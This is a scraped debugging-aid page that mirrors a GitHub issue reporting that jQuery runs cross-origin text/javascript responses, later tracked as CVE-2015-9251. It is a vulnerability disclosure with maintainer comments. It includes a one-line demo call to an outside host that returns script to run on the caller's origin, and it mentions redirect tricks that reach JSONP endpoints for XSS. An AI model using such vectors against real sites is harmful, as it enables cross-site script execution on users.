Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses
See original GitHub issueBecause of this https://github.com/jquery/jquery/blob/250a1990baa571de60325ab2c52eabb399c4cf9e/src/ajax/script.js#L18 every text/javascript response gets executed. Even if we made a request to another service. CORS was created exactly to prevent this kind of behavior in JSONP (arbitrary code execution).
So when we do $.get(‘http://weather.com/sf-weather’) or like in Rails’ jquery_ujs a form is being sent automatically, the attacker can respond us with text/javascript and execute arbitrary code on our origin. Demo $.get('http://sakurity.com/jqueryxss')
The fix is to not execute responses from 3rd party origins by default and make it an option. Don’t know who to cc to discuss it.
P.S. I would switch it off for same origin either, because using subtle redirect_to saving tricks we can redirect user to local JSONP endpoint and still get an XSS but those are much more sophisticated vectors.
Issue Analytics
- State:
- Created 8 years ago
- Reactions:11
- Comments:39 (23 by maintainers)
Top Results From Across the Web
Top Related Medium Post
Top Related StackOverflow Question
Troubleshoot Live Code
Top Related Reddit Thread
Top Related Hackernoon Post
Top Related Tweet
Top Related Dev.to Post
Top Related Hashnode Post
Everything about automated script detection is configurable so it’s pretty easy to disable it (untested examples that should work):
Not a fan of changing the behaviour within the lib but I can understand the rationale (though I’d recommand just removing the javascript dataType detection in the default options then).
CVE-2015-9251 was assigned to track this issue.